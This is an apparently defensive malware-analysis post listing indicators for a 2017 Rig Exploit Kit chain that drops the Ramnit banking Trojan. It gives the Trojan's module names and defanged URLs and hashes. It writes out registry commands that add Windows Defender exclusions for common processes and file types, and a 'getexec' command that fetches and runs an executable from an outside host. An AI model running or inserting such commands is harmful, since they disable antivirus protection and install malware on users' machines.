08-10-2017 – Rig Exploit Kit Leads to Ramnit aka "demetra" Banker via CVE-2015-8651

• MTUzNzcy (base64 landing)
• NDYzMzgw (base64 exploit)
• man
• pan
• work
• shop

Ramnit aka “demetra” banking Trojan (dropped in %TEMP%; concatenates :Zone.Identifier as svchost[.]exe to the string and attempts to remove it as an anti-analysis trick, and leverages User Account Control (UAC) bypass method using application compatibility databases based on sdbinst[.]exe):

• AvTrust
• Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)
• XX’S
• Chrome reinstall
• Chrome reinstall module (x64-x86) v0.1
• CookieGrabber
• Cookie Grabber v0.2 (no mask)
• FtpGrabber2
• Ftp Grabber v2.0
• XX’S
• Hooker
• Spy module (Zeus, SE, Rootkit, Ignore SPDY) v4
• VNC IFSB
• VNC IFSB x64-x86

• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
• REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0 

• URL: http://188.225.78%5B.%5D174/?MTUzNzcy&pan=..&man=..&work=..
• SHA1: b1078d9c131f3eb3bfb3a765a41d08f0ea0e5f36 

• URL: http://188.225.78%5B.%5D174/?NDYzMzgw&pan=..&man=..&shop=..
• SHA1: aa6219cea38038d39b86ed05d5d5d7b60a7ae811 

Ramnit initial:

• SHA1: d14c01bf072721a08dbbe75c6e1bc5e66ea2f972 
• Location: %TEMP%

Ramnit getexec payload: 

• Command: getexec http://194.58.39%5B.%5D177/lenta3%5B.%5Dexe lenta.exe
• URL: http://194.58.39%5B.%5D177/lenta3%5B.%5Dexe 
• SHA1: 1b4e16beb1fdde74b459451500b54abcff9ca3b2